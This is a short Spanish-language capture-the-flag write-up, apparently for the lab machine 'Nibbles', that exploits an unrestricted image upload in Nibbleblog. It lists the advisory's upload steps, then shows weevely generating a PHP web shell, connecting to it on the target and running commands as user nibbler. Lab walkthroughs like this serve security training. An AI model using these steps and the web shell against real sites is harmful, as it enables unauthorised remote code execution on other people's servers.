Este ya lo había hecho pero usando metasploit. Una vez descubrimos la version de Nibbleblog podemos encontrar la vulnerabilidad en internet. En resumen, podemos subir imagenes sin filtros de tipo. Por lo que podemos subir un PHP sin problema. Lo que es más interesante todavía es que podemos acceder al URL directamente y activarlo.

    Obtain Admin credentials (for example via Phishing via XSS which can
be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
    Activate My image plugin by visiting
http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
    Upload PHP shell, ignore warnings
    Visit
http://localhost/nibbleblog/content/private/plugins/my_image/image.php.

Para ponerle un poco de emoción use weevely. Weevely es un generador de shells de PHP que puedes acceder directamente sin usar NC.

Como siempre Weevely es gratis y además viene instalado en Kali :).

root@Kali2:~# weevely generate 1234 /root/Desktop/weetest.php
Generated '/root/Desktop/weetest.php' with password '1234' of 685 byte size.
// subimos el archivo
root@Kali2:~# weevely http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php 1234

[+] weevely 3.7.0

[+] Target:    10.10.10.75
[+] Session:    /root/.weevely/sessions/10.10.10.75/image_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> whoami
nibbler
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image $

Y listo, a partir de aqui funciona exactamente igual que el anterior blog post.